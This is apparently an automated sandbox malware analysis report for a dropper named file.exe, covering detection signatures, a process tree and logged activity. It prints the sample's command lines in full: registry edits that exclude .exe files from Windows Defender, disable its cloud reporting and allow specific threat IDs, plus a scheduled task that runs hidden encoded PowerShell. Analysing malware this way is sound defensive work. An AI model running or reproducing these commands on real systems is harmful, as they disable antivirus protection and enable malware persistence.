Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:753408
MD5:e99e15a440798e20c682eb859b3f7885
SHA1:b6f3b87894f51669dede0afe6cb4b504fe0ae614
SHA256:c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
Tags:exe
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5932 cmdline: C:\Users\user\Desktop\file.exe MD5: E99E15A440798E20C682EB859B3F7885)
    • Install.exe (PID: 4760 cmdline: .\Install.exe MD5: 65D01849A2062434BCE6C580CDA92A1D)
      • Install.exe (PID: 5620 cmdline: .\Install.exe /S /site_id "525403" MD5: 893793FBD70BA4A92919D09205D6C9C1)
        • forfiles.exe (PID: 4732 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3096 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 1544 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6180 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • forfiles.exe (PID: 5064 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6152 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 6172 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6208 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 6236 cmdline: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6276 cmdline: schtasks /run /I /tn "gAhELFxgt" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6332 cmdline: schtasks /DELETE /F /TN "gAhELFxgt" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6488 cmdline: schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6316 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • gpupdate.exe (PID: 6752 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • pJKKXsE.exe (PID: 6576 cmdline: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S MD5: 893793FBD70BA4A92919D09205D6C9C1)
    • powershell.exe (PID: 6604 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6176 cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • reg.exe (PID: 6192 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6180 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4520 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2992 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1364 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6216 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6156 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6232 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1876 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4036 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2372 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3668 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6268 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6312 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • gpscript.exe (PID: 6920 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Persistence and Installation Behavior

barindex
Sigma detected: Schedule system process
Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /S /site_id "525403", ParentImage: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, ParentProcessId: 5620, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 6236, ProcessName: schtasks.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeReversingLabs: Detection: 51%
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exeReversingLabs: Detection: 51%
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040553A FindFirstFileA,
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
Source: powershell.exe, 00000018.00000002.420007208.00000173FD929000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.430262427.0000000000DCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000018.00000002.352296909.00000173E56E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.432102762.00000000037B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: Install.exe, 00000005.00000002.484866347.0000000001ABA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

barindex
Very long command line found
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: Commandline size = 3260
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: Commandline size = 3260
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile deleted: C:\Windows\SysWOW64\GroupPolicySMsYeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile created: C:\Windows\system32\GroupPolicy\gpt.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004162A6
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040E5A5
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004126B0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00403A01
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00418EF1
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00418FCB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FF9A5641988
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00E4CA48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00E48BA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00E48BB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067DB790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DF0E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D1000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D1010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068E8658
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DB4F9
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00413954 appears 179 times
Source: file.exe, 00000001.00000000.284047943.0000000000427000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exeBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
